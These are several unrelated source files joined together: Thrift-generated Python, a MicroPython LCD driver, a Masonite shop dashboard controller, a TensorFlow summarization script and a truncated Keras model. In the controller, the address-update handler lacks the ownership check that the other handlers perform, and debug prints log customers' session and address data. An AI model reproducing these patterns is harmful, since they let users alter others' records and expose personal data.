if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype287, _size284) = iprot.readListBegin()
for _i288 in range(_size284):
_elem289 = CastInfo()
_elem289.read(iprot)
self.success.append(_elem289)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.se = ServiceException()
self.se.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('ReadCastInfo_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter290 in self.success:
iter290.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.se is not None:
oprot.writeFieldBegin('se', TType.STRUCT, 1)
self.se.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(ReadCastInfo_result)
ReadCastInfo_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT, [CastInfo, None], False), None, ), # 0
(1, TType.STRUCT, 'se', [ServiceException, None], None, ), # 1
)
fix_spec(all_structs)
del all_structs
|
<reponame>dnisbet/python_lcd<filename>lcd/machine_gpio_lcd.py
"""Implements a HD44780 character LCD connected via pyboard GPIO pins."""
from lcd_api import LcdApi
from machine import Pin
import time, utime
class GpioLcd(LcdApi):
"""Implements a HD44780 character LCD connected via pyboard GPIO pins."""
def __init__(self, rs_pin, enable_pin, d0_pin=None, d1_pin=None,
d2_pin=None, d3_pin=None, d4_pin=None, d5_pin=None,
d6_pin=None, d7_pin=None, rw_pin=None, backlight_pin=None,
num_lines=2, num_columns=16):
"""Constructs the GpioLcd object. All of the arguments must be pyb.Pin
objects which describe which pin the given line from the LCD is
connected to.
When used in 4-bit mode, only D4, D5, D6, and D7 are physically
connected to the LCD panel. This function allows you call it like
GpioLcd(rs, enable, D4, D5, D6, D7) and it will interpret that as
if you had actually called:
GpioLcd(rs, enable, d4=D4, d5=D5, d6=D6, d7=D7)
The enable 8-bit mode, you need pass d0 through d7.
The rw pin isn't used by this library, but if you specify it, then
it will be set low.
"""
self.rs_pin = rs_pin
self.enable_pin = enable_pin
self.rw_pin = rw_pin
self.backlight_pin = backlight_pin
self._4bit = True
if d4_pin and d5_pin and d6_pin and d7_pin:
self.d0_pin = d0_pin
self.d1_pin = d1_pin
self.d2_pin = d2_pin
self.d3_pin = d3_pin
self.d4_pin = d4_pin
self.d5_pin = d5_pin
self.d6_pin = d6_pin
self.d7_pin = d7_pin
if self.d0_pin and self.d1_pin and self.d2_pin and self.d3_pin:
self._4bit = False
else:
# This is really 4-bit mode, and the 4 data pins were just
# passed as the first 4 arguments, so we switch things around.
self.d0_pin = None
self.d1_pin = None
self.d2_pin = None
self.d3_pin = None
self.d4_pin = d0_pin
self.d5_pin = d1_pin
self.d6_pin = d2_pin
self.d7_pin = d3_pin
self.rs_pin.init(Pin.OUT)
self.rs_pin.low()
if self.rw_pin:
self.rw_pin.init(Pin.OUT)
self.rw_pin.low()
self.enable_pin.init(Pin.OUT)
self.enable_pin.low()
self.d4_pin.init(Pin.OUT)
self.d5_pin.init(Pin.OUT)
self.d6_pin.init(Pin.OUT)
self.d7_pin.init(Pin.OUT)
self.d4_pin.low()
self.d5_pin.low()
self.d6_pin.low()
self.d7_pin.low()
if not self._4bit:
self.d0_pin.init(Pin.OUT)
self.d1_pin.init(Pin.OUT)
self.d2_pin.init(Pin.OUT)
self.d3_pin.init(Pin.OUT)
self.d0_pin.low()
self.d1_pin.low()
self.d2_pin.low()
self.d3_pin.low()
if self.backlight_pin is not None:
self.backlight_pin.init(Pin.OUT)
self.backlight_pin.low()
# See about splitting this into begin
utime.sleep_ms(20) # Allow LCD time to powerup
# Send reset 3 times
self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
utime.sleep_ms(5) # need to utime.sleep_ms at least 4.1 msec
self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
utime.sleep_ms(1)
self.hal_write_init_nibble(self.LCD_FUNCTION_RESET)
utime.sleep_ms(1)
cmd = self.LCD_FUNCTION
if not self._4bit:
cmd |= self.LCD_FUNCTION_8BIT
self.hal_write_init_nibble(cmd)
utime.sleep_ms(1)
LcdApi.__init__(self, num_lines, num_columns)
if num_lines > 1:
cmd |= self.LCD_FUNCTION_2LINES
self.hal_write_command(cmd)
def hal_pulse_enable(self):
"""Pulse the enable line high, and then low again."""
self.enable_pin.low()
utime.sleep_ms(1)
self.enable_pin.high()
utime.sleep_ms(1) # Enable pulse needs to be > 450 nsec
self.enable_pin.low()
utime.sleep_ms(100) # Commands need > 37us to settle
def hal_write_init_nibble(self, nibble):
"""Writes an initialization nibble to the LCD.
This particular function is only used during initialization.
"""
self.hal_write_4bits(nibble >> 4)
def hal_backlight_on(self):
"""Allows the hal layer to turn the backlight on."""
if self.backlight_pin:
self.backlight_pin.high()
def hal_backlight_off(self):
"""Allows the hal layer to turn the backlight off."""
if self.backlight_pin:
self.backlight_pin.low()
def hal_write_command(self, cmd):
"""Writes a command to the LCD.
Data is latched on the falling edge of E.
"""
self.rs_pin.low()
self.hal_write_8bits(cmd)
if cmd <= 3:
# The home and clear commands require a worst
# case utime.sleep_ms of 4.1 msec
utime.sleep_ms(5)
def hal_write_data(self, data):
"""Write data to the LCD."""
self.rs_pin.high()
self.hal_write_8bits(data)
def hal_write_8bits(self, value):
"""Writes 8 bits of data to the LCD."""
if self.rw_pin:
self.rw_pin.low()
if self._4bit:
self.hal_write_4bits(value >> 4)
self.hal_write_4bits(value)
else:
self.d3_pin.value(value & 0x08)
self.d2_pin.value(value & 0x04)
self.d1_pin.value(value & 0x02)
self.d0_pin.value(value & 0x01)
self.hal_write_4bits(value >> 4)
def hal_write_4bits(self, nibble):
"""Writes 4 bits of data to the LCD."""
self.d7_pin.value(nibble & 0x08)
self.d6_pin.value(nibble & 0x04)
self.d5_pin.value(nibble & 0x02)
self.d4_pin.value(nibble & 0x01)
self.hal_pulse_enable()
|
<reponame>krishotte/web_sperky<gh_stars>0
"""A DashboardController Module."""
from masonite.request import Request
from masonite.view import View
from masonite.controllers import Controller
from .PortfolioController import get_user
from .auth.LoginController import get_caller_path
from app.Product import Product
from app.Order import Order
from .EditPortfolioController import add_image_path
from app.User import User
from app.Address import Address
from app.Shipping import Shipping
from app.OrderState import OrderState
from masonite import env
import pendulum
import json
from app.Variant import Variant
from .PortfolioController import get_settings
from masonite import Mail
from app.mailable.AdminsNewOrderMailable import AdminsNewOrderMailable
from threading import Thread
import time
class DashboardController(Controller):
"""DashboardController Controller Class."""
def __init__(self, request: Request):
"""DashboardController Initializer
Arguments:
request {masonite.request.Request} -- The Masonite Request class.
"""
self.request = request
def show(self, request: Request, view: View):
user = get_user(request)
user_ = User.where('email', '=', user['email']).first()
user_.addresses()
return view.render('dash/profile', {
'user': user,
'user_': user_,
'settings': get_settings(),
})
def show_profile(self, request: Request, view: View):
user = get_user(request)
user_ = User.where('email', '=', user['email']).first()
user_.addresses()
if user_.verified_at is not None:
print(f' user verified')
# print(f' environ: {request.environ}')
print(f' APP_URL: {request.header("APP_URL")}')
# print(f' env: {env("APP_URL")}')
return view.render('dash/profile', {
'user': user,
'user_': user_,
'settings': get_settings(),
})
def show_orders(self, request: Request, view: View):
user = get_user(request)
orders = request.user().orders().order_by('id', 'desc').get()
orders.load('order_state')
for order in orders:
print(f' datetime: {order.created_at.strftime("%Y-%m-%d")}')
print(f' your orders: {orders.serialize()}')
return view.render('dash/orders', {
'user': user,
'orders': orders.serialize(),
'settings': get_settings(),
})
def show_single_order(self, request: Request, view: View):
user = get_user(request)
order = Order.find(request.param('order_id'))
order.address
order.shipping
order.order_state
print(f' order to display: {order.serialize()}')
# serialized_products = add_image_path(order.products.serialize())
for product in order.products:
if product.pivot.variant_id:
product.load({
'variants': Variant.query().where('id', '=', product.pivot.variant_id)
})
serialized_products = add_image_path(order.products.serialize())
print(f' products: {serialized_products}') # order.products.serialize()}')
if order.user.email == user['email']:
return view.render('dash/single_order', {
'user': user,
'order': order.serialize(),
'products': serialized_products,
'settings': get_settings(),
})
else:
print(f' not your order')
return request.redirect('/dashboard/orders')
# cart control methods
def show_cart(self, request: Request, view: View):
user = get_user(request)
try:
items = request.session.get('ordered_items')
print(f' cart contains: {items}')
unique_items = items_to_unique(items)
print(f' unique items: {unique_items}')
except Exception:
raise
unique_items = []
total_price = 0
serialized_products, total_price = evaluate_cart(unique_items, total_price)
request.session.set('total_price', total_price)
# print(f' products: {products}')
return view.render('dash/cart', {
'user': user,
'ordered_items': unique_items,
'products': serialized_products,
'total_price': total_price,
'settings': get_settings(),
})
def add_to_cart(self, request: Request):
"""
obsolete - not used
items to order are held in cookie as list
items can be in list multiple times
"""
caller = get_caller_path(request)
# request.session.reset()
if request.session.has('ordered_items'):
items = request.session.get('ordered_items')
items.append(int(request.param('product_id')))
request.session.set('ordered_items', items)
else:
request.session.set('ordered_items', [int(request.param('product_id'))])
request.session.flash('success', 'Produkt bol pridaný do košíka')
print(f' session : {request.session.all()}')
return request.redirect(caller)
def add_to_cart2(self, request: Request):
caller = get_caller_path(request)
product_id = int(request.input('product_id'))
variant_id = int(request.input('variant_id'))
print(f' request: {request.all()}')
product = Product.find(product_id)
product.variants
if len(product.variants) > 0:
if request.has('variant_id'):
# order product with variant
print(f' variant required, variant selected')
if request.session.has('ordered_items'):
items = request.session.get('ordered_items')
items.append({
'product_id': product_id,
'variant_id': variant_id,
})
request.session.set('ordered_items', json.dumps(items))
else:
request.session.set('ordered_items', json.dumps([{
'product_id': product_id,
'variant_id': variant_id,
}]))
request.session.flash('success', 'Produkt bol pridaný do košíka')
else:
# order not possible
print(f' variant required, but not found')
request.session.flash('warning', 'Prosím vyberte si variant produktu')
else:
# order product without variant
if request.session.has('ordered_items'):
items = request.session.get('ordered_items')
print(f' items: {items}')
items.append({
'product_id': product_id,
})
request.session.set('ordered_items', json.dumps(items))
else:
request.session.set('ordered_items', json.dumps([{
'product_id': product_id,
}]))
request.session.flash('success', 'Produkt bol pridaný do košíka')
return request.redirect(caller)
def remove_from_cart(self, request: Request, view: View):
"""
remove one item from cart
"""
caller = get_caller_path(request)
# item_to_remove = int(request.input('item_to_remove'))
ordered_items = request.session.get('ordered_items')
print(f' ordered items before del: {ordered_items}')
if request.has('variant_id'):
item_to_remove = {
'product_id': int(request.input('item_to_remove')),
'variant_id': int(request.input('variant_id')),
}
else:
item_to_remove = {'product_id': int(request.input('item_to_remove'))}
index_of_item = ordered_items.index(item_to_remove)
ordered_items.pop(index_of_item)
print(f' ordered items after del: {ordered_items}')
request.session.set('ordered_items', json.dumps(ordered_items))
return request.redirect(caller)
# order control methods
def order_show_user_details(self, request: Request, view: View):
"""
first step of order
user select address to send order to
"""
user = get_user(request)
user_ = User.where('email', '=', user['email']).first()
user_.addresses()
print(f' user addresses: {user_.addresses.serialize()}')
return view.render('dash/order/user_data', {
'user': user,
'user_': user_,
'settings': get_settings(),
})
def order_set_user_address(self, request: Request):
"""
sets order address to cookie
redirects to shipping
"""
address_id = int(request.input('address_id'))
address = Address.find(address_id)
print(f' address to use: {address.serialize()}')
request.session.set('address', address.id)
return request.redirect('/order-shipping')
def order_show_shipping(self, request: Request, view: View):
"""
allows to go back from order review
"""
user = get_user(request)
user_ = User.where('email', '=', user['email']).first()
user_.addresses()
shippings = Shipping.all()
payments = [
{'name': 'V hotovosti pri prebratí tovaru'},
{'name': 'Bankovým prevodom'},
]
return view.render('dash/order/shipping', {
'user': user,
'user_': user_,
'shippings': shippings,
'payments': payments,
'settings': get_settings(),
})
def order_set_shipping(self, request: Request):
"""
saves shipping to session, redirects to order review
"""
request.session.set('shipping', int(request.input('shipping_id')))
return request.redirect('/order-review')
def order_back_to_shipping(self, request: Request):
"""
saves note to session, redirects to order_show_shipping
"""
note = request.input('note')
print(f' saving note to session: {note}')
request.session.set('note', note)
return request.redirect('/order-shipping')
def order_review(self, request: Request, view: View):
"""
shows order review
"""
user = get_user(request)
user_ = User.where('email', '=', user['email']).first()
shipping = Shipping.find(int(request.session.get('shipping')))
address = Address.find(int(request.session.get('address')))
items = request.session.get('ordered_items')
unique_items = items_to_unique(items)
note = request.session.get('note')
total_price = shipping.price
serialized_products, total_price = evaluate_cart(unique_items, total_price)
request.session.set('total_price', total_price)
return view.render('dash/order/review_order', {
'user': user,
'user_': user,
'ordered_items': unique_items,
'products': serialized_products,
'total_price': total_price,
'shipping': shipping,
'address': address,
'note': note,
'settings': get_settings(),
})
def make_order(self, request: Request, mail: Mail):
print(f' session: {request.session.all()}')
shipping = Shipping.find(int(request.session.get('shipping')))
address = Address.find(int(request.session.get('address')))
items = request.session.get('ordered_items')
unique_items = items_to_unique(items)
note = request.input('note')
total_price = float(request.session.get('total_price'))
products = []
try:
for index, each in enumerate(unique_items):
product = Product.find(each['product_id'])
if 'variant_id' in each:
product.load({
'variants': Variant.query().where('id', '=', each['variant_id'])
})
products.append(product)
except Exception:
pass
print(f' products1: {products}')
# let's make an order
order = Order(total_price=total_price, note=note)
order.user().associate(request.user())
order_state = OrderState.where('phase', '=', 1).first()
order.order_state().associate(order_state)
order.shipping().associate(shipping)
order.address().associate(address)
# save to get an id
order.save()
order.name = f"{pendulum.now().format('%Y')}{str(order.id).zfill(4)}"
order.save()
print(f' order saved')
for index, product in enumerate(products):
if len(product.variants) > 0:
if product.variants[0].price:
product_price = product.variants[0].price
else:
product_price = product.price
order.products().attach(product, {
'product_count': unique_items[index]['count'],
'unit_price': product_price,
'variant_id': unique_items[index]['variant_id'],
})
else:
order.products().attach(product, {
'product_count': unique_items[index]['count'],
'unit_price': product.price,
})
# send notification to admins
admins = User.where('role_id', '=', 1).get()
emails = []
for admin in admins:
emails.append(AdminsNewOrderMailable(admin.email, order))
thr1 = Thread(target=admin_send_order_notification, args=[mail, emails])
thr1.start()
# clear session
request.session.reset()
return request.redirect('/dashboard/orders')
# user address control methods
def show_new_address(self, request: Request, view: View):
"""
shows form for new user address
"""
user = get_user(request)
print(f' logged in user: {user}')
return view.render('dash/new_address', {
'user': user,
'settings': get_settings(),
})
def store_new_address(self, request: Request):
user = get_user(request)
print(f' logged in user: {user}')
user_ = User.where('email', '=', user['email']).first_or_fail()
address1 = Address(
street=request.input('street'),
zip_code=request.input('zip_code'),
city=request.input('city'),
name=request.input('name'),
phone=request.input('phone'),
)
print(f' address to store: {address1}')
user_.addresses().save(address1)
return request.redirect('/dashboard/profile')
def show_existing_address(self, request: Request, view: View):
user = get_user(request)
print(f' logged in user: {user}')
address_id = request.param('address_id')
address_ = Address.find(address_id)
if address_.user.email == user['email']:
print(f' your address')
# return request.redirect('/dashboard/profile')
return view.render('dash/existing_address', {
'user': user,
'address': address_,
'settings': get_settings(),
})
else:
print(f' not your address')
return request.redirect('/dashboard')
def store_existing_address(self, request: Request):
user = get_user(request)
print(f' logged in user: {user}')
user_ = User.where('email', '=', user['email']).first_or_fail()
address1 = Address.find(request.input('id'))
address1.street = request.input('street')
address1.zip_code = request.input('zip_code')
address1.city = request.input('city')
address1.name = request.input('name')
address1.phone = request.input('phone')
print(f' address to store: {address1.serialize()}')
address1.save()
return request.redirect('/dashboard/profile')
def delete_address(self, request: Request):
user = get_user(request)
print(f' logged in user: {user}')
address_id = request.param('address_id')
address_ = Address.find(address_id)
if address_.user.email == user['email']:
print(f' your address, deleting ...')
# return request.redirect('/dashboard/profile')
address_.delete()
return request.redirect('/dashboard/profile')
else:
print(f' not your address')
return request.redirect('/dashboard')
def items_to_unique(items):
"""
builds list of unique items with counts
:param items:
:return:
"""
unique_items = []
counts = []
unique_items_with_counts = []
try:
for item in items:
count = items.count(item)
if item not in unique_items:
# item['count'] = count
unique_items.append(item)
counts.append(count)
for index, uitem in enumerate(unique_items):
uitem['count'] = counts[index]
unique_items_with_counts.append(uitem)
except Exception:
pass
return unique_items_with_counts
def evaluate_cart(unique_items, total_price):
"""
prepare products with variants for view
:param unique_items:
:return: products
"""
total_price_ = total_price
products = []
try:
for each in unique_items:
product = Product.find(each['product_id'])
if 'variant_id' in each:
# load variant if selected
product.load({
'variants': Variant.query().where('id', '=', each['variant_id'])
})
if product.variants[0].price:
# count in variant price if exists
total_price_ += product.variants[0].price * each['count']
else:
total_price_ += product.price * each['count']
else:
total_price_ += product.price * each['count']
products.append(product.serialize())
print(f' products: {products}')
print(f' total price: {total_price_}')
serialized_products = add_image_path(products)
except Exception:
serialized_products = []
return serialized_products, total_price_
def admin_send_order_notification(mail, emails):
print(f' sending order notification to admins from another thread')
for email in emails:
mail.mailable(email).send()
time.sleep(2)
|
<filename>seq2seq_attention.py<gh_stars>1-10
'''
This is a seq2seq model (hierarchical encoder - decoder) with
constrained hierarchical attention (word-level attention + sent-level attention).
The constraints are from the results of extractive summarization.
'''
import sys
import time
import os
import tensorflow as tf
import batch_reader
import data
import seq2seq_attention_decode
import seq2seq_attention_model
import numpy as np
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('article_path',
'', 'Path expression to source articles.')
tf.app.flags.DEFINE_string('abstract_path',
'', 'Path expression to target abstracts.')
tf.app.flags.DEFINE_string('vocab_path',
'', 'Path expression to article text vocabulary file.')
tf.app.flags.DEFINE_string('prob_path',
'', "Path expression to source articles' probabilities for extractive summary")
tf.app.flags.DEFINE_string('label_path',
'', 'Path expression to labels of extractive summarization.')
tf.app.flags.DEFINE_string('emb_path',
'', 'Path expression to pre-trained word embedding.')
tf.app.flags.DEFINE_integer('emb_dim',
300, 'Dimension of word embedding.')
tf.app.flags.DEFINE_string('log_root', '', 'Directory for model root.')
tf.app.flags.DEFINE_string('train_dir', '', 'Directory for train.')
tf.app.flags.DEFINE_string('eval_dir', '', 'Directory for eval.')
tf.app.flags.DEFINE_string('decode_dir', '', 'Directory for decode summaries.')
tf.app.flags.DEFINE_string('mode', 'train', 'train/eval/decode/tag mode')
tf.app.flags.DEFINE_integer('max_run_steps', 10000000,
'Maximum number of run steps.')
tf.app.flags.DEFINE_integer('article_sentences_num', 35,
'Number of sentences to use from the '
'article.')
tf.app.flags.DEFINE_integer('max_article_sentences_length', 50,
'Length of each sentence to use from the '
'article.')
tf.app.flags.DEFINE_integer('abstract_length', 100,
'Max number of first sentences to use from the '
'abstract.')
tf.app.flags.DEFINE_integer('beam_size', 5,
'beam size for beam search decoding.')
tf.app.flags.DEFINE_integer('eval_interval_secs', 60, 'How often to run eval.')
tf.app.flags.DEFINE_integer('checkpoint_secs', 1000, 'How often to checkpoint.')
tf.app.flags.DEFINE_bool('use_bucketing', False,
'Whether bucket articles of similar length.')
tf.app.flags.DEFINE_bool('truncate_input', False,
'Truncate inputs that are too long. If False, '
'examples that are too long are discarded.')
tf.app.flags.DEFINE_integer('random_seed', 111, 'A seed value for randomness.')
def _RunningAvgLoss(loss, running_avg_loss, summary_writer, step, decay=0.999):
"""Calculate the running average of losses."""
if running_avg_loss == 0:
running_avg_loss = loss
else:
running_avg_loss = running_avg_loss * decay + (1 - decay) * loss
running_avg_loss = min(running_avg_loss, 20)
loss_sum = tf.Summary()
loss_sum.value.add(tag='running_avg_loss', simple_value=running_avg_loss)
summary_writer.add_summary(loss_sum, step)
sys.stdout.write('step %d, running_avg_loss: %f\n' % (step, running_avg_loss))
return running_avg_loss
def _Train(model, data_batcher):
"""Runs model training."""
with tf.device('/cpu:0'):
model.build_graph()
saver = tf.train.Saver(max_to_keep=10)
# Train dir is different from log_root to avoid summary directory
# conflict with Supervisor.
summary_writer = tf.summary.FileWriter(FLAGS.train_dir)
sv = tf.train.Supervisor(logdir=FLAGS.log_root,
is_chief=True,
saver=saver,
summary_op=None,
save_summaries_secs=60,
save_model_secs=FLAGS.checkpoint_secs,
global_step=model.global_step)
sess = sv.prepare_or_wait_for_session(config=tf.ConfigProto(
allow_soft_placement=True))
running_avg_loss = 0
step = 0
while not sv.should_stop() and step < FLAGS.max_run_steps:
#startTime0 = time.time()
#startTime1 = time.time()
(article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent, abstract_lens,
loss_weights, enc_weights_sent, enc_weights_doc, _, _) = data_batcher.NextBatch()
#endTime1 = time.time()
#print "read data using %f secs"%(endTime1-startTime1)
#startTime2 = time.time()
(_, summaries, loss, train_step) = model.run_train_step(
sess, article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
#endTime2 = time.time()
#print "run train step using %f secs"%(endTime2-startTime2)
summary_writer.add_summary(summaries, train_step)
running_avg_loss = _RunningAvgLoss(
running_avg_loss, loss, summary_writer, train_step)
step += 1
if step % 100 == 0:
summary_writer.flush()
#endTime0 = time.time()
#print "each batch using %f secs"%(endTime0-startTime0)
sv.Stop()
def _Eval(model, data_batcher, vocab=None):
"""Runs model eval."""
model.build_graph()
saver = tf.train.Saver()
summary_writer = tf.summary.FileWriter(FLAGS.eval_dir)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
running_avg_loss = 0
step = 0
bestmodel_save_path = os.path.join(FLAGS.eval_dir, 'bestmodel')
best_loss = None
while True:
time.sleep(FLAGS.eval_interval_secs)
try:
ckpt_state = tf.train.get_checkpoint_state(FLAGS.log_root)
except tf.errors.OutOfRangeError as e:
tf.logging.error('Cannot restore checkpoint: %s', e)
continue
if not (ckpt_state and ckpt_state.model_checkpoint_path):
tf.logging.info('No model to eval yet at %s', FLAGS.train_dir)
continue
tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)
saver.restore(sess, ckpt_state.model_checkpoint_path)
(article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent, abstract_lens,
loss_weights, enc_weights_sent, enc_weights_doc, _, _) = data_batcher.NextBatch()
(summaries, loss, train_step) = model.run_eval_step(
sess, article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
'''
tf.logging.info(
'article: %s',
' '.join(data.Ids2Words(article_batch[0][0][:].tolist(), vocab)))
tf.logging.info(
'abstract: %s',
' '.join(data.Ids2Words(abstract_batch[0][:].tolist(), vocab)))
'''
summary_writer.add_summary(summaries, train_step)
running_avg_loss = _RunningAvgLoss(
running_avg_loss, loss, summary_writer, train_step)
if best_loss is None or running_avg_loss < best_loss:
tf.logging.info('Found new best model with %.3f running_avg_loss. Saving to %s', running_avg_loss, bestmodel_save_path)
saver.save(sess, bestmodel_save_path, global_step=train_step, latest_filename='checkpoint_best')
best_loss = running_avg_loss
step += 1
if step % 100 == 0:
summary_writer.flush()
def _Tag(model, data_batcher, hps, vocab):
"Runs model tagging"
model.build_graph()
saver = tf.train.Saver(max_to_keep=10)
summary_writer = tf.summary.FileWriter(FLAGS.tagging_dir)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
running_avg_loss = 0
step = 0
while step<230:
print("Step: %d" % step)
time.sleep(FLAGS.eval_interval_secs)
try:
ckpt_state = tf.train.get_checkpoint_state(FLAGS.log_root)
except tf.errors.OutOfRangeError as e:
tf.logging.error('Cannot restore checkpoint: %s', e)
continue
if not (ckpt_state and ckpt_state.model_checkpoint_path):
tf.logging.info('No model to eval yet at %s', FLAGS.train_dir)
continue
tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)
saver.restore(sess, ckpt_state.model_checkpoint_path)
(article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc, origin_articles, origin_abstracts) = data_batcher.NextBatch()
(sigmoid_score, summaries, loss, train_step) = model.run_tagging_step(
sess, article_batch, abstract_batch, enc_labels_batch, targets, article_lens_doc,
article_lens_sent, abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
if not os.path.exists(FLAGS.tagging_dir):
os.mkdir(FLAGS.tagging_dir)
tag_file = open(os.path.join(FLAGS.tagging_dir, 'tag'), 'a')
ref_file = open(os.path.join(FLAGS.tagging_dir, 'ref'), 'a')
gen_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'gen_abstract'), 'a')
ref_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'ref_abstract'), 'a')
origin_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'origin_abstract'), 'a')
acc = 0
best_tagging = np.zeros([hps.batch_size, hps.enc_sent_num], dtype=np.float32)
for i in range(hps.batch_size):
tagging_list = []
ref_list = []
tagging = []
ref = []
for j in range(article_lens_doc[i]):
if(sigmoid_score[i][j] >= 0.5):
tagging_list.append('1.0')
tagging.append(1.0)
gen_abstract_file.write(origin_articles[i][j] + ' ')
else:
tagging_list.append('0.0')
tagging.append(0.0)
ref_list.append(str(enc_labels_batch[i][j]))
ref.append(float(enc_labels_batch[i][j]))
if(enc_labels_batch[i][j] == 1.0):
ref_abstract_file.write(origin_articles[i][j]+' ')
acc += list(np.array(tagging) - np.array(ref)).count(0.0)*1.0 / len(tagging)
tag_file.write(' '.join(tagging_list) + '\n')
ref_file.write(' '.join(ref_list) + '\n')
gen_abstract_file.write('\n')
ref_abstract_file.write('\n')
origin_abstract_file.write(origin_abstracts[i] + '\n')
origin_abstract_file.close()
ref_abstract_file.close()
gen_abstract_file.close()
ref_file.close()
tag_file.close()
summary_writer.add_summary(summaries, train_step)
running_avg_loss = _RunningAvgLoss(running_avg_loss, loss, summary_writer, train_step)
print "average accuracy: %f" % (acc*1.0/hps.batch_size)
step += 1
if step % 100 == 0:
summary_writer.flush()
def main(unused_argv):
vocab = data.Vocab(FLAGS.vocab_path, FLAGS.emb_path, FLAGS.emb_dim, 50000)
# Check for presence of required special tokens.
assert vocab.CheckVocab(data.PAD_TOKEN) > 0
assert vocab.CheckVocab(data.UNKNOWN_TOKEN) >= 0
assert vocab.CheckVocab(data.SENTENCE_START) > 0
assert vocab.CheckVocab(data.SENTENCE_END) > 0
batch_size = 16
if FLAGS.mode == 'decode':
batch_size = FLAGS.beam_size
hps = seq2seq_attention_model.HParams(
mode=FLAGS.mode, # train, eval, decode
min_lr=0.01, # min learning rate.
lr=0.15, # learning rate
batch_size=batch_size,
num_labels=2,
enc_layers_sent=1,
enc_layers_doc=1,
enc_sent_num=FLAGS.article_sentences_num,
max_enc_sent_len=FLAGS.max_article_sentences_length,
dec_timesteps=FLAGS.abstract_length,
min_input_len=1, # discard articles/summaries < than this
num_hidden=200, # for rnn cell
emb_dim=FLAGS.emb_dim, # If 0, don't use embedding
para_lambda=100, # the weight for attention loss
para_beta=0.5,
max_grad_norm=2,
num_softmax_samples=0) # If 0, no sampled softmax.
print "initialize batcher......"
batcher = batch_reader.Batcher(
FLAGS.article_path, FLAGS.abstract_path, FLAGS.prob_path, FLAGS.label_path, vocab, hps, bucketing=FLAGS.use_bucketing,
truncate_input=FLAGS.truncate_input)
tf.set_random_seed(FLAGS.random_seed)
print "read all batches......"
batcher._MakeBatchesWithBuckets()
batcher.CreateNewBuckets()
if hps.mode == 'train':
model = seq2seq_attention_model.Seq2SeqAttentionModel(
hps, vocab)
_Train(model, batcher)
elif hps.mode == 'eval':
model = seq2seq_attention_model.Seq2SeqAttentionModel(
hps, vocab)
_Eval(model, batcher, vocab=vocab)
elif hps.mode == 'decode':
decode_mdl_hps = hps
# Only need to restore the 1st step and reuse it since
# we keep and feed in state for each step's output.
decode_mdl_hps = hps._replace(dec_timesteps=1)
model = seq2seq_attention_model.Seq2SeqAttentionModel(
decode_mdl_hps, vocab)
decoder = seq2seq_attention_decode.BSDecoder(model, batcher, hps, vocab)
decoder.DecodeLoop()
elif hps.mode == 'tagging':
model = seq2seq_attention_model.Seq2SeqAttentionModel(
hps, vocab)
_Tag(model, batcher, hps, vocab=vocab)
if __name__ == '__main__':
tf.app.run() |
import numpy as np
import tensorflow.keras as keras
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import SparseCategoricalCrossentropy
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from tensorflow_privacy.privacy.optimizers.dp_optimizer import DPAdamGaussianOptimizer
import tensorflow as tf
from ...entities.datasource import Datasource
from ...entities.experiment import Experiment
from ...entities.global_model import GlobalModel
class GlobalModel_Purchases(GlobalModel):
"""
A Global model for Purchases classification task
"""
def __init__(self, output_size=100):
super(GlobalModel_Purchases, self).__init__(output_size)
def build_model(self):
"""
Example Architecture for Purchases
:return:
"""
model = Sequential()
model.add(Dense(1024, activation="tanh", input_dim=600, kernel_regularizer=l2(0)))
model.add(Dense(512, activation="tanh", kernel_regularizer=l2(0)))
model.add(Dense(256, activation="tanh", kernel_regularizer=l2(0)))
model.add(Dense(128, activation="tanh", kernel_regularizer=l2(0)))
model.add(Dense(self.output_size, activation='softmax'))
loss = SparseCategoricalCrossentropy(from_logits=False)
model.compile(loss=loss,
optimizer=Adam(lr=0.001),
